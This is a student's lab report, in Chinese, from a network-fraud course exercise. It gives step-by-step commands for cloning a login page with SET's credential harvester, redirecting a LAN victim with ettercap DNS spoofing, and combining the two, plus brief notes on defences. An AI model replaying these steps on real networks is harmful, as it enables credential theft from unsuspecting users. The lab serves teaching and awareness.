实验要求:
本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有
(1)简单应用SET工具建立冒名网站 (1分)
(2)ettercap DNS spoof (1分)
(3)结合应用两种技术,用DNS spoof引导特定访问到冒名网站。(1.5分)
(4)请勿使用外部网站做实验
基础问题回答:
(1)通常在什么场景下容易受到DNS spoof攻击。
- 同一局域网下,或者在各种公共WIFI中。
(2)在日常生活工作中如何防范以上两攻击方法
- 使用最新版本的DNS服务器软件,并及时安装补丁;
- 关闭DNS服务器的递归功能。
- 不要依赖DNS:不要在高度敏感和保密要求高的系统上浏览网页,最好不要使用DNS。如果有软件依赖于主机名来运行,那么可以在设备主机文件里手动指定。
- 使用入侵检测系统:只要正确部署和配置,使用入侵检测系统就可以检测出大部分形式的ARP缓存中毒攻击和DNS欺骗攻击。
实验内容:
简单应用SET工具建立冒名网站:
- 输入
netstat -tupln |grep 80
查看80端口是否被使用,如果被使用的话,则使用kill + PID
杀死进程
- 输入
sudo vi /etc/apache2/ports.conf
指令修改Apache的端口配置文件,将端口改为http对应的80号端口
- 输入
apachectl start
开启Apache服务 - 输入
setoolkit
打开SET工具 - 输入
1
选择 Social-Engineering Attacks(社会工程学攻击)
- 输入
2
选择 Website Attack Vectors(钓鱼网站攻击向量)
- 输入
3
Credential Harvester Attack Method(登录密码截取攻击)
- 输入
2
Site Cloner(进行克隆网站)
- 输入
192.168.1.127
(攻击者IP) - 输入
pam.baidu.com
(被克隆的url)
- 在靶机中输入
http:192.168.1.127
访问,靶机中链接到登录界面
不知道是百度网盘保护还是我电脑问题,试了几次还是白色的······ - kali中收到回连信息,此时输入的登录ID与密码都会被截获
ettercap DNS spoof
- 输入
ifconfig eth0 promisc
将kali改为混杂模式 - 输入
vi /etc/ettercap/etter.dns
对DNS缓存表进行修改 - IP要换成攻击者的主机IP
192.168.1.127
- 输入
ettercap -G
开启ettercap,选择 Sniff -> unified sniffing ,在弹出的界面中选择 eth0 -> ok,监听eth0网卡
- 选择 Hosts -> Scan for hosts 扫描子网
- 选择 Hosts -> Hosts list查看存活主机
- 将攻击者的IP
192.168.1.127
(kali的网关)添加到target1,靶机IP192.168.1.211
添加到target2
- 选择 Plugins -> Manage the plugins -> dns_spoof (DNS欺骗的插件)->双击
- 选择 start -> Start sniffing 开始嗅探
- 在靶机中输入
ping www.cnblogs.com
会发现解析的地址是攻击机的IP地址 - 此时在ettercap上也成功捕获访问记录
结合应用两种技术,用DNS spoof引导特定访问到冒名网站
- 建立冒名网站的步骤同之前的相同,在IP设置时输入
192.168.1.127
,克隆的网站输入mosoteach.cn
(蓝墨云)完成第一步。
- 设置DNS spoof的步骤同之前的相同。
- 在靶机kali中输入
ping www.cnblogs.com
返回的数据中显示的是攻击者kali的IP,访问www.cnblogs.com
时跳转到之前克隆的蓝墨云网站界面。
实验感想
- 通过这次实验,我才知道连上那些垃圾网站或WIFI会被黑的多惨,以后再也不敢乱上网连WIFI了。